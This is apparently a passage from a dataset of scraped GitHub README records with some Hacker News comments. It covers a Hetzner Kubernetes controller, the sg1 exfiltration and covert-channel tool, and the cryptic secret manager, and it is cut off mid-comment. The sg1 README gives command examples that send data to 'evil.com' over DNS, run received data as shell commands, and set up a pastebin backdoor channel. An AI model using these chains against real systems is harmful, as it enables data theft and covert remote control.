hcloud://123456 # <-- Server ID\nstatus:\n addresses:\n - address: master\n type: Hostname\n - address: 78.46.208.178 # <-- public ipv4\n type: ExternalIP\n```\n\n## Deployment\n\nThis deployment example uses `kubeadm` to bootstrap an Kubernetes\ncluster, with [flannel](https://github.com/coreos/flannel) as overlay\nnetwork agent. Feel free to adapt the steps to your preferred method of\ninstalling Kubernetes.\n\nThese deployment instructions are designed to guide with the\ninstallation of the `hcloud-cloud-controller-manager` and are by no\nmeans an in depth tutorial of setting up Kubernetes clusters.\n**Previous knowledge about the involved components is required.**\n\nPlease refer to the [kubeadm cluster creation\nguide](https://kubernetes.io/docs/setup/independent/create-cluster-kubeadm/),\nwhich these instructions are meant to argument and the [kubeadm\ndocumentation](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm/).\n\n1. The cloud controller manager adds its labels when a node is added to\n the cluster. For Kubernetes versions prior to 1.23, this means we\n have to add the `--cloud-provider=external` flag to the `kubelet`\n before initializing the cluster master with `kubeadm init`. To do\n accomplish this we add this systemd drop-in unit\n `/etc/systemd/system/kubelet.service.d/20-hcloud.conf`:\n\n ```\n [Service]\n Environment=\"KUBELET_EXTRA_ARGS=--cloud-provider=external\"\n ```\n\n Note: the `--cloud-provider` flag is deprecated since K8S 1.19. You\n will see a log message regarding this.\n\n2. Now the cluster master can be initialized:\n\n ```sh\n sudo kubeadm init --pod-network-cidr=10.244.0.0/16\n ```\n\n3. 
Configure kubectl to connect to the kube-apiserver:\n\n ```sh\n mkdir -p $HOME/.kube\n sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config\n sudo chown $(id -u):$(id -g) $HOME/.kube/config\n ```\n\n4. Deploy the flannel CNI plugin:\n\n ```sh\n kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/v0.9.1/Documentation/kube-flannel.yml\n ```\n\n5. Patch the flannel deployment to tolerate the `uninitialized` taint:\n\n ```sh\n kubectl -n kube-system patch ds kube-flannel-ds --type json -p '[{\"op\":\"add\",\"path\":\"/spec/template/spec/tolerations/-\",\"value\":{\"key\":\"node.cloudprovider.kubernetes.io/uninitialized\",\"value\":\"true\",\"effect\":\"NoSchedule\"}}]'\n ```\n\n6. Create a secret containing your Hetzner Cloud API token.\n\n ```sh\n kubectl -n kube-system create secret generic hcloud --from-literal=token=\n ```\n\n7. Deploy the `hcloud-cloud-controller-manager`:\n\n ```\n kubectl apply -f https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml\n ```\n\n## Networks support\n\nWhen you use the Cloud Controller Manager with networks support, the CCM is in favor of allocating the IPs (& setup the\nrouting) (Docs: https://kubernetes.io/docs/concepts/architecture/cloud-controller/#route-controller). The CNI plugin you\nuse needs to support this k8s native functionality (Cilium does it, I don't know about Calico & WeaveNet), so basically\nyou use the Hetzner Cloud Networks as the underlying networking stack.\n\nWhen you use the CCM without Networks support it just disables the RouteController part, all other parts work completely\nthe same. Then just the CNI is in charge of making all the networking stack things. Using the CCM with Networks support\nhas the benefit that your node is connected to a private network so the node doesn't need to encrypt the connections and\nyou have a bit less operational overhead as you don't need to manage the Network.\n\nIf you want to use the Hetzner Cloud `Networks` Feature, head over to\nthe [Deployment with Networks support\ndocumentation](./docs/deploy_with_networks.md).\n\nIf you manage the network yourself it might still be required to let the CCM know about private networks. You can do\nthis by adding the environment variable\nwith the network name/ID in the CCM deployment.\n\n```\n env:\n - name: HCLOUD_NETWORK\n valueFrom:\n secretKeyRef:\n name: hcloud\n key: network\n```\n\nYou also need to add the network name/ID to the\nsecret: `kubectl -n kube-system create secret generic hcloud --from-literal=token= --from-literal=network=`\n.\n\n## Kube-proxy mode IPVS and HCloud LoadBalancer\n\nIf `kube-proxy` is run in IPVS mode, the `Service` manifest needs to have the\nannotation `load-balancer.hetzner.cloud/hostname` where the FQDN resolves to the HCloud LoadBalancer IP.\n\nSee https://github.com/hetznercloud/hcloud-cloud-controller-manager/issues/212\n\n## Versioning policy\n\nWe aim to support the latest three versions of Kubernetes. After a new\nKubernetes version has been released we will stop supporting the oldest\npreviously supported version. This does not necessarily mean that the\nCloud Controller Manager does not still work with this version. However,\nit means that we do not test that version anymore. Additionally, we will\nnot fix bugs related only to an unsupported version. 
We also try to keep\ncompatibility with the respective k3s release for a specific Kubernetes\nrelease.\n\n### With Networks support\n\n| Kubernetes | k3s | Cloud Controller Manager | Deployment File |\n|------------|--------------:|-------------------------:|-----------------------------------------------------------------------------------------------------------:|\n| 1.26 | v1.26.0+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n| 1.25 | v1.25.5+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n| 1.24 | v1.24.9+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n| 1.23 | v1.23.15+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n\n### Without Networks support\n\n| Kubernetes | k3s | Cloud Controller Manager | Deployment File |\n|------------|--------------:|-------------------------:|--------------------------------------------------------------------------------------------------:|\n| 1.26 | v1.26.0+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n| 1.25 | v1.25.5+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n| 1.24 | v1.24.9+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n| 1.23 | v1.23.15+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n\n## Unit tests\n\nTo run unit tests locally, execute\n\n```sh\ngo test $(go list ./... | grep -v e2etests) -v\n```\n\nCheck that your go version is up to date, tests might fail if it is not.\n\nIf in doubt, check which go version the `test:unit` section in `.gitlab-ci.yml`\nhas set in the `image: golang:$VERSION`.\n\n## E2E Tests\n\nThe Hetzner Cloud cloud controller manager was tested against all\nsupported Kubernetes versions. We also test against the same k3s\nreleases (Sample: When we support testing against Kubernetes 1.20.x we\nalso try to support k3s 1.20.x). We try to keep compatibility with k3s\nbut never guarantee this.\n\nYou can run the tests with the following commands. Keep in mind, that\nthese tests run on real cloud servers and will create Load Balancers\nthat will be billed.\n\n**Test Server Setup:**\n\n1x CPX21 (Ubuntu 18.04)\n\n**Requirements: Docker and Go 1.19**\n\n1. Configure your environment correctly\n\n```bash\nexport HCLOUD_TOKEN=\nexport K8S_VERSION=k8s-1.21.0 # The specific (latest) version is needed here\nexport USE_SSH_KEYS=key1,key2 # Name or IDs of your SSH Keys within the Hetzner Cloud, the servers will be accessable with that keys\nexport USE_NETWORKS=yes # if `yes` this identidicates that the tests should provision the server with cilium as CNI and also enable the Network related tests\n## Optional configuration env vars:\nexport TEST_DEBUG_MODE=yes # With this env you can toggle the output of the provision and test commands. With `yes` it will log the whole output to stdout\nexport KEEP_SERVER_ON_FAILURE=yes # Keep the test server after a test failure.\n```\n\n2. Run the tests\n\n```bash\ngo test $(go list ./... | grep e2etests) -v -timeout 60m\n```\n\nThe tests will now run and cleanup themselves afterwards. 
Sometimes it might happen that you need to clean up the\nproject manually via the [Hetzner Cloud Console](https://console.hetzner.cloud) or\nthe [hcloud-cli](https://github.com/hetznercloud/cli) .\n\nFor easier debugging on the server we always configure the latest version of\nthe [hcloud-cli](https://github.com/hetznercloud/cli) with the given `HCLOUD_TOKEN` and a few bash aliases on the host:\n\n```bash\nalias k=\"kubectl\"\nalias ksy=\"kubectl -n kube-system\"\nalias kgp=\"kubectl get pods\"\nalias kgs=\"kubectl get services\"\n```\n\n## Local test setup\nThis repository provides [skaffold](https://skaffold.dev/) to easily deploy / debug this controller on demand\n\n### Requirements\n1. Install [hcloud-cli](https://github.com/hetznercloud/cli)\n2. Install [k3sup](https://github.com/alexellis/k3sup)\n3. Install [cilium](https://github.com/cilium/cilium-cli)\n4. Install [docker](https://www.docker.com/)\n\nYou will also need to set a `HCLOUD_TOKEN` in your shell session\n### Manual Installation guide\n1. Create an SSH key\n\nAssuming you already have created an ssh key via `ssh-keygen`\n```\nhcloud ssh-key create --name ssh-key-ccm-test --public-key-from-file ~/.ssh/id_rsa.pub \n```\n\n2. Create a server\n```\nhcloud server create --name ccm-test-server --image ubuntu-20.04 --ssh-key ssh-key-ccm-test --type cx11 \n```\n\n3. Setup k3s on this server\n```\nk3sup install --ip $(hcloud server ip ccm-test-server) --local-path=/tmp/kubeconfig --cluster --k3s-channel=v1.23 --k3s-extra-args='--no-flannel --no-deploy=servicelb --no-deploy=traefik --disable-cloud-controller --disable-network-policy --kubelet-arg=cloud-provider=external'\n```\n- The kubeconfig will be created under `/tmp/kubeconfig`\n- Kubernetes version can be configured via `--k3s-channel`\n\n4. Switch your kubeconfig to the test cluster. Very important: exporting this like \n```\nexport KUBECONFIG=/tmp/kubeconfig\n```\n\n5. Install cilium + test your cluster\n```\ncilium install\n```\n\n6. Add your secret to the cluster\n```\nkubectl -n kube-system create secret generic hcloud --from-literal=\"token=$HCLOUD_TOKEN\"\n```\n\n7. Install hcloud-cloud-controller-manager + test your cluster\n```\nkubectl apply -f https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml\nkubectl config set-context default\nkubectl get node -o wide\n```\n\n8. Deploy your CSI driver\n```\nSKAFFOLD_DEFAULT_REPO=naokiii skaffold dev\n```\n- `docker login` required\n- Skaffold is using your own dockerhub repo to push the CSI image.\n\nOn code change, skaffold will repack the image & deploy it to your test cluster again. Also, it is printing all logs from csi components.\n\n*After setting this up, only the command from step 8 is required!*\n\n## License\n\nApache License, Version 2.0\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "evilsocket/sg1", "link": "https://github.com/evilsocket/sg1", "tags": [], "stars": 521, "description": "A wanna be swiss army knife for data encryption, exfiltration and covert communication.", "lang": "Go", "repo_lang": "", "readme": "# SG1\n\n```\n _______ \n _,.--==###\\_/=###=-.._ \n ..-' _.--\\\\_//---. `-.. \n ./' ,--'' \\_/ `---. `\\. \n ./ \\ .,-' _,,......__ `-. / \\. \n /`. ./\\' _,.--'':_:'\"`:'`-..._ /\\. .'\\ \n / .'`./ ,-':\":._.:\":._.:\"+._.:`:. \\.'`. `. \n ,' // .-''\"`:_:'\"`:_:'\"`:_:'\"`:_:'`. \\ \\ \n / ,' /'\":._.:\":._.:\":._.:\":._.:\":._.`. `. 
\\ \n / / ,'`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_\\ \\ \\ \n ,\\\\ ; /_.:\":._.:\":._.:\":._.:\":._.:\":._.:\":\\ ://, \n / \\\\ /'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\\ // \\. \n |//_ \\ ':._.:\":._.+\":._.:\":._.:\":._.:\":._.:\":._\\ / _\\\\ \\ \n /___../ /_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"'. \\..__ | \n | | '\":._.:\":._.:\":._.:\":._.:\":._.:\":._.:\":._.| | | \n | | |-:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`| | | \n | | |\":._.:\":._.:\":._.:\":._.:\":._.+\":._.:\":._.| | | \n | : |_:'\"`:_:'\"`:_+'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`| ; | \n | \\ \\.:._.:\":._.:\":._.:\":._.:\":._.:\":._.:\":._| / | \n \\ : \\:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'.' ; | \n \\ : \\._.:\":._.:\":._.:\":._.:\":._.:\":._.:\":,' ; / \n `. \\ \\..--:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`-../ / / \n `__.`.'' _..+'._.:\":._.:\":._.:\":._.:\":.`+._ `-,:__` \n .-'' _ -' .'| _________________________ |`.`-. `-.._ \n _____' _..-|| :.' .+/;;';`;`;;:`)+(':;;';',`\\;\\|. `,'|`-. `_____\n MJP .-' .'.' :- ,'/,',','/ /./|\\.\\ \\`,`,-,`.`. : `||-.`-._ \n .' ||.-' ,','/,' / / / + : + \\ \\ \\ `,\\ \\ `.`-|| `. `-. \n .-' |' _','<', ,' / / // | \\\\ \\ \\ `, ,`.`. `. `. `-. \n : - `. `. \n BECAUSE\n REASONS \n```\n\nSG1 is a wanna be swiss army knife for data encryption, exfiltration and covert communication. In its core `sg1` aims to be as simple to use as `nc` while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods.\n\nHave you ever thought to have your chats or data transfers tunneled through encrypted, private and self deleting pastebins? What about sending that stuff to some dns client -> dns server bridge? Then TLS maybe? :D\n\n**WORK IN PROGRESS, DON'T JUDGE** \n\n[![Go Report Card](https://goreportcard.com/badge/github.com/evilsocket/sg1)](https://goreportcard.com/report/github.com/evilsocket/sg1)\n\n## The Plan\n\n- [x] Working utility to move data in one direction only ( `input channel` -> `module,module,...` -> `output channel` ).\n- [ ] Bidirectional communication, aka moving from the concept of `channel` to `tunnel`, each tunnel object should derive from [net.Conn](https://golang.org/pkg/net/#Conn) in order to use the Pipe method. 
*-work in progress-*\n- [ ] SOCKS5 tunnel implementation, once done sg1 can be used for browsing and tunneling arbitrary TCP communications.\n- [ ] Implement `sg1 -probe server-ip-here` and `sg1 -discover 0.0.0.0` commands, the sg1 client will use every possible channel to connect to the sg1 server and create a tunnel.\n- [ ] Deployment with `sg1 -deploy` command, with \"deploy tunnels\" like `-deploy ssh:user:password@host:/path/` (deploy tunnels can be obfuscated as well).\n- [ ] Orchestrator `sg1 -orchestrate config.json` to create a randomized and encrypted exfiltration chain of tunnels in a TOR-like network.\n\n## Installation\n\nMake sure you have at least **go 1.8** in order to build `sg1`, then:\n\n go get github.com/miekg/dns\n go get github.com/evilsocket/sg1\n\n cd $GOPATH/src/github.com/evilsocket/sg1/\n make\n\nIf you want to build for a different OS and / or architecture, you can instead do:\n\n GOOS=windows GOARCH=386 make\n\nAfter compilation, you will find the `sg1` binary inside the `build` folder, you can start with taking a look at the help menu:\n\n ./build/sg1 -h\n\n## Contribute\n\n0) Read the code, love the code, fix the code.\n1) Check `The Plan` section of this README and see what you can do.\n2) Grep for `TODO` and see how you can help.\n3) Implement a new module ( see `modules/raw.go` for very basic example or `modules/aes.go` for complete one ).\n4) Implement a new channel ( see `channels/*.go` ).\n5) Write tests, because I'm a lazy s--t.\n\n## Features\n\nThe main `sg1` operation logic is:\n\n while input.has_data() {\n data = input.read()\n foreach module in modules {\n data = module.process(data)\n }\n output.write(data)\n }\n\nKeep in mind that modules and channels can be piped one to another, just use `sg1 -h` to see a list of available channels and modules, try to pipe them and see what happens ^_^\n\n### Modules\n\nModules can be combined, for instance if you want to read from input, decrypt from AES and execute, you would use:\n\n -in:... 
-modules aes,exec -aes-mode decrypt -aes-key _somekeysomekey_ -out:...\n\n**raw** \n\nThe default mode, will read from input and write to output.\n\n**base64**\n\nWill read from input, encode in base64 and write to output.\n\n**aes** \n\nWill read from input, encrypt or decrypt (depending on `--aes-mode` parameter, which is `encrypt` by default) with `--aes-key` and write to output.\n\nExamples:\n\n -modules aes --aes-key y0urp4ssw0rd\n -modules aes -aes-modules decrypt --aes-key y0urp4ssw0rd\n\n**exec**\n\nWill read from input, execute as a shell command and pipe to output.\n\n### Channels\n\n**console**\n\nThe default channel, stdin or stdout depending on the direction.\n\n**tcp** \n\nA tcp server (if used as input) or client (as output).\n\nExamples:\n\n -in tcp:0.0.0.0:10000\n -out tcp:192.168.1.2:10000\n\n**udp** \n\nAn udp packet listener (if used as input) or client (as output).\n\nExamples:\n\n -in udp:0.0.0.0:10000\n -out udp:192.168.1.2:10000\n\n**tls**\n\nA tls tcp server (if used as input) or client (as output), it will automatically generate the key pair or load them via `--tls-pem` and `--tls-key` optional parameters.\n\nExamples:\n\n -in tls:0.0.0.0:10003\n -out tls:192.168.1.2:10003\n\n**icmp** \n\nIf used as output, data will be chunked and sent as ICMP echo packets, as input an ICMP listener will be started decoding those packets.\n\nExamples:\n\n -in icmp:0.0.0.0\n -out icmp:192.168.1.2\n\n**dns** \n\nIf used as output, data will be chunked and sent as DNS requests, as input a DNS server will be started decoding those requests. The accepted syntaxes are:\n\n dns:domain.tld@resolver:port\n\nIn which case, DNS requests will be performed (or decoded) for subdomains of `domain.tld`, sent to the `resolver` ip address on `port`.\n\n dns:domain.tld\n\nDNS requests will be performed (or decoded) for subdomains of `domain.tld` using default system resolver.\n\n dns\n\nDNS requests will be performed (or decode) for subdomains of `google.com` using default system resolver.\n\nExamples:\n\n -in dns:evil.com@0.0.0.0:10053\n -out dns:evil.com@192.168.1.2:10053\n -out dns:evil.com\n\n**pastebin**\n\nIf used as output, data will be chunked and sent to pastebin.com as private pastes, as input a pastebin listener will be started decoding those pastes.\n\nExamples:\n\n -in pastebin:YOUR-API-KEY/YOUR-USER-KEY\n -in pastebin:YOUR-API-KEY/YOUR-USER-KEY#some-stream-name\n -out pastebin:YOUR-API-KEY/YOUR-USER-KEY\n -out pastebin:YOUR-API-KEY/YOUR-USER-KEY#some-stream-name\n\n[This](https://pastebin.com/api#8 ) is how you can retrieve your user key given your api key.\n\n## Examples\n\nIn the following examples you will always see 127.0.0.1, but that can be any ip, the tool is tunnelling data locally as a PoC but it also works among different computers on any network (as shown by one of the pictures). 
Also note that the command line shown in those pictures might be different from this documentation; this is because the screenshots were taken at different stages of development. Use this README as the reference for the updated command line options.\n\n--\n\nTLS client -> server session (if no `--tls-pem` or `--tls-key` arguments are specified, a self-signed certificate will be automatically generated by sg1):\n![tls](https://pbs.twimg.com/media/DPPSi8KW4AIVDVo.jpg:large)\n\nSimple file exfiltration over DNS:\n![file](https://pbs.twimg.com/media/DPH8KkAWsAE5rZZ.jpg:large)\n\nQuick and dirty AES encrypted chat over TCP:\n![aes-tcp](https://pbs.twimg.com/media/DPHAlOXWAAA9kKv.jpg:large)\n\nOr over ICMP:\n![icmp](https://pbs.twimg.com/media/DPfJ--aWsAEng-y.jpg:large)\n\nPastebin AES encrypted data tunnel with self-deleting private pastes:\n![pastebin](https://pbs.twimg.com/media/DPQl7zoXUAAIdQ9.jpg:large)\n\nEncrypting data with AES and exfiltrating it via DNS requests:\n![aes-dns](https://pbs.twimg.com/media/DPHsSLwWkAEbg7P.jpg:large)\n\nExecuting commands encoded and sent via DNS requests:\n![exec](https://pbs.twimg.com/media/DPKgERnX0AEKuJn.jpg:large)\n\nUse several machines to create exfiltration tunnels ( tls -> dns -> command execution -> tcp ):\n![tunnel](https://pbs.twimg.com/media/DPPhxAnX4AI7UUV.jpg:large)\n\nTest with different operating systems ( tnx to [decoded](https://twitter.com/d3d0c3d) ):\n![freebsd](https://pbs.twimg.com/media/DPH0612UQAA3gzg.jpg:large)\n\nWith bouncing to another host:\n![bounce](https://pbs.twimg.com/media/DPHtBocWsAAyDVN.jpg:large)\n\nSome `stdin` -> `dns packets` -> `pastebin temporary paste` -> `stdout` hops:\n![hops](https://pbs.twimg.com/media/DPQ58EhW0AA7CFz.jpg:large)\n\nCovert backdoor channel using pastebin streams and AES encryption:\n![streams](https://pbs.twimg.com/media/DPmGuXqWsAEEi48.jpg:large)\n\n## License\n\nSG1 was made with \u2665 by [Simone Margaritelli](https://www.evilsocket.net/) and it's released under the GPL 3 license.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "domodwyer/cryptic", "link": "https://github.com/domodwyer/cryptic", "tags": [], "stars": 521, "description": "A sensible secret management toolkit (and Go library) for admins and programmers", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/domodwyer/cryptic.svg?branch=master)](https://travis-ci.org/domodwyer/cryptic) [![GoDoc](https://godoc.org/github.com/domodwyer/cryptic?status.svg)](https://godoc.org/github.com/domodwyer/cryptic)\n\n

\nManage API keys, passwords, certificates, etc. with infrastructure you already use.\n

\n\n- Proven encryption, by default uses *AES-256* with *SHA-256* for integrity checks.\n- Supports multiple data stores - use infrastructure you already have.\n- No dependency hell: single binary to store a secret, one more to fetch.\n- Use [Amazon KMS](https://aws.amazon.com/kms/) key wrapping to further control access to sensitive information.\n- Super **simple** to use!\n\n# Usage\nPut a password somewhere:\n```\n./put -name=ApiKey -value=\"be65d27ae088a0e03fd8e1331d90b01649464cb7\"\n```\n\nGet a password back out somewhere else:\n```\n./get -name=ApiKey\n```\n\nOr as part of a script (say, an environment variable):\n```\nexport API_KEY=$(get -name=ApiKey)\n```\n\n# Installation\nDownload a [release](https://github.com/domodwyer/cryptic/releases) for the binaries and get going straight away.\n\nDrop a simple YAML file in the same directory as the binary (`./cryptic.yml` or `/etc/cryptic/cryptic.yml` for a global configuration) to configure encryption and stores - below is a minimal example:\n\n```yml\nStore: \"db\"\nEncryptor: \"aes-gcm-pbkdf2\"\n\nDB:\n Host: \"127.0.0.1:3306\"\n Name: \"db-name\"\n Username: \"root\"\n Password: \"password\"\n\n# When in any \"pbkdf2\" Encryptor mode, the Key parameter is hashed\n# 4096 times with SHA-512 and used as the key for AES-256\n\nAES:\n Key: \"super-secret-key\" \n```\n\n# Configuration\nBellow are all the configurable options for Cryptic:\n```yml\n# Store can be either 'redis' or 'db'\nStore: \"db\"\n\nDB:\n Host: \"127.0.0.1:3306\"\n Name: \"db-name\"\n Username: \"root\"\n Password: \"password\"\n Table: \"secrets\"\n KeyColumn: \"name\"\n ValueColumn: \"data\"\n\nRedis:\n Host: \"127.0.0.1:6379\"\n DbIndex: 0\n Password: \"\"\n ReadTimeout: \"3s\"\n WriteTimeout: \"5s\"\n MaxRetries: 0\n\n# Encryptor can be either 'aes-gcm-pbkdf2', 'aes-pbkdf2', 'aes' or 'kms'\nEncryptor: \"kms\"\n\n# AES key size must be 16, 24 or 32 chars if encryptor = 'aes'\nAES:\n Key: \"changeme\"\n HmacKey: \"changeme\" # only needed if encryptor = 'aes'\n\n# KMS uses AES-256 and SHA256 for HMAC\nKMS:\n KeyID: \"427a117a-ac47-4c90-b7fe-b33fe1a7a241\"\n Region: \"eu-west-1\"\n```\n\n# Database\n\nThe database table is a simple key-value table, but **must** include a UNIQUE constraint on the key column. Below is a SQL snippet suitable for the default settings:\n\n```sql\nCREATE TABLE `secrets` (\n `id` int(11) unsigned NOT NULL AUTO_INCREMENT,\n `name` varchar(255) NOT NULL DEFAULT '',\n `data` blob NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `idx_name` (`name`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4\n```\n\n# Amazon KMS / Key Wrapping\n[Amazon KMS](https://aws.amazon.com/kms/) is a key-management service that provides key wrapping and auditing features (and more) that you can take advantage of to further secure your secrets.\n\nUsing IAM roles you can control read access to only your production machines for example, or only your dev team, or perhaps only certain users.\n\nCryptic gets a secure 512-bit key from KMS and uses that to encrypt your data. 
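
As a rough, self-contained illustration of this wrap-and-unwrap ("envelope encryption") pattern, the sketch below uses the AWS SDK for Go (v1) to request a data key from KMS, encrypts a secret locally under it with AES-GCM, and then unwraps the stored key again (the decryption path described next). This is not cryptic's actual code: it asks for a 256-bit data key and omits the separate HMAC handling that cryptic applies to its 512-bit key.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"log"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/session"
	"github.com/aws/aws-sdk-go/service/kms"
)

func main() {
	// Illustrative sketch only; error handling and key sizes are simplified
	// compared to cryptic's real KMS encryptor.
	sess := session.Must(session.NewSession(aws.NewConfig().WithRegion("eu-west-1")))
	svc := kms.New(sess)

	// 1. Ask KMS for a fresh data key. Plaintext is used locally and then
	//    discarded; CiphertextBlob is stored alongside the encrypted secret.
	dk, err := svc.GenerateDataKey(&kms.GenerateDataKeyInput{
		KeyId:   aws.String("427a117a-ac47-4c90-b7fe-b33fe1a7a241"), // your KMS KeyID
		KeySpec: aws.String(kms.DataKeySpecAes256),
	})
	if err != nil {
		log.Fatal(err)
	}

	// 2. Encrypt the secret locally with AES-GCM under the plaintext data key.
	block, _ := aes.NewCipher(dk.Plaintext)
	gcm, _ := cipher.NewGCM(block)
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		log.Fatal(err)
	}
	sealed := gcm.Seal(nil, nonce, []byte("be65d27ae088a0e03fd8e1331d90b01649464cb7"), nil)

	// 3. To read the secret back, unwrap the stored key via KMS and decrypt
	//    locally; neither the stored ciphertext nor KMS alone is enough.
	unwrapped, err := svc.Decrypt(&kms.DecryptInput{CiphertextBlob: dk.CiphertextBlob})
	if err != nil {
		log.Fatal(err)
	}
	block, _ = aes.NewCipher(unwrapped.Plaintext)
	gcm, _ = cipher.NewGCM(block)
	secret, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(string(secret))
}
```
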
To decrypt, first the stored key is sent to KMS for decryption, and the result is used to decrypt the AES-256 encrypted secret locally - your encrypted secret can't be recovered without both KMS and your AES secret.\n\nIncluded is a [terraform](https://www.terraform.io/) configuration to generate a KMS key - `terraform apply` and it'll return a key ID such as `427a117a-ac47-4c90-b7fe-b33fe1a7a241` (or make it [manually](https://docs.aws.amazon.com/kms/latest/developerguide/create-keys.html)).\n\nAssuming you have the AWS CLI installed and credentials configured, all you need is to configure like above and go!\n\n# Library Usage / Source\n```\ngo get -v github.com/domodwyer/cryptic\n```\n\nFor an example of how to use the library, check out the `put` and `get` binaries - each are only 50 lines long!\n\nThe library supports storage of binary secrets, though the CLI tools currently don't. Retries/backoff/circuit-breaking/etc is left to the library user.\n\nPR's welcome - please target to the `dev` branch.\n\nOh, and **vendor this** and everything else if you value your sanity.\n\n# Testing\nUnit tests cover every aspect of the library, including integration tests.\n\nDon't run integration tests against production systems, they might go wild and ruin your day.\n\nFor redis: `REDIS_HOST=\"localhost:6379\" go test ./... -v -tags=\"integration\"`\n\nFor KMS: `AWS_REGION=\"eu-west-1\" KMS_KEY_ID=\"\" go test ./... -v -tags=\"awsintegration\"`\n\nOr combine them for double the fun.\n\n# Credits\n\nThe idea was largely taken from [credstash](https://github.com/fugue/credstash) - I just didn't want to install python + dependencies, and I wanted to use redis. Many of the same security implications mentioned on the credstash README apply to Cryptic too.\n\n# Improvements\n\n- More backends (S3/DynamoDB/memcached/MongoDB/etc)\n- Secret versioning/rotation/expiration\n- Support for pipelined requests to backends to reduce latency\n- Redis transactional existing-key check with `WATCH`\n", "readme_type": "markdown", "hn_comments": "I went with biscuit because it writes to a simple file and I am not worried about updating 2 secrets at once, particularly since I have a different file per app per environment.\nhttps://github.com/dcoker/biscuit/blob/master/README.mdThis is exactly the use case of https://github.com/gtank/cryptopastaAlthough, the only thing I can see it doing wrong is the use of passwords as keys https://github.com/domodwyer/cryptic/blob/6bd92fab6778dac26c... which is still an open issue in cryptopasta https://github.com/gtank/cryptopasta/issues/7Why does management deserve a toolkit? Why should it remain a secret?And is the toolkit really that much of a secret after it's been posted on HN?I think it's safe to say that the cat's out of the bag.So this is a neat idea, because Credstash and Sneaker are certainly not perfect gizmos, but it leads to the turtles problem: how do I securely handle the initial key that's being plopped on systems? If I can do that, I don't need Cryptic.I've become a big fan of Credstash over the last few months largely because it solves (well, more like makes irrelevant, I wouldn't really strongly say it's \"solved\") this problem through using AWS as a trusted third party. Further, Credstash actually handles key ACLs in a much, much smarter way in that it uses KMS encryption contexts, which can be dropped into an IAM policy's Condition block, to further restrict access to secrets. 
Cryptic doesn't seem to offer this, and its use of Redis as a backing store (itself intended to be used in trusted environments) makes me worried, too.If continuing along with this project--and please don't take this as discouraging, it seems largely reasonable as a thing!--I would look in more depth at how Credstash uses KMS and bloodily rip it off to improve Cryptic's KMS functionality; it's very, very good at what it's doing.I looked through the project and it is cryptic indeed.I will try to digest a little bit for people who aren't familiar with Go and by any chance read the project's README- The examples you see there with commands like `./put ...` `./get ...` are actual Go command line apps found in the `cmd` directory.What I mean is there are two command line applications which you actually might need to build separately one named `put` the other `get` . What they do, oh! well , never mind it should be crypting stuffs.After being tasked to do devops for like 6 months. I understand the pain of having more secrets than those of the secret agencies we see on the movies.Something that turn out to be true most of the times is, secrets should always be secrets. Managing secrets is supposed to be a secret.I find the Configuration on the README to be full of secrets I mean passwords , API keys e.t.c. And wondering if cryptic is aware of that and how it is going to address this.With my little understanding about security. I have a feeling that In some cases encryption is mistaken with secure.Cool! I've love to hear more about the security and crypto design. I started writing up some questions but after asking so many it feels like I should just check out the code and answer some of them for myself. Still, I left the discussion here in case you're interested :)I've been working on a similar tool in Rust: https://github.com/ketralnis/secrets. My focus has been less APIs and more person-to-person (e.g. sharing the team's twitter password between humans that need to use it) but I'd love to hear how you've solved some of the conceptual problems that I've struggled with in trying to make it secure.Some issues that I've struggled with:1. withstanding attacks on the file format, some of which are described in this paper: https://www.cs.ox.ac.uk/files/6487/pwvault.pdf. My answer has been the logging system that I talk about in Auditing below but I'd love to hear how you withstand some of these attacks in your system where it looks like you don't even control the file format (is that mysql?)2. bootstrapping trust. how do I know I haven't been MitM'd, and how can I avoid having to trust the server? My system has a public/private key for every user, so when I share a password with you I'm encrypting it to your public key. The worst possible case then is that I inject my public key claiming to be you because then I get the passwords instead of you. Preventing this while also allowing for public keys to be rotated after a compromise of a client machine is currently stumping me. My current solution is to keep a record of every public key I've seen before, when I see a new one prompt the user to double check it out-of-band (like SSH does), and to just refuse to ever use a new public key for a user that I've seen before. But I bet that users don't actually check this, just like with SSH. And ideally I wouldn't rely on less secure 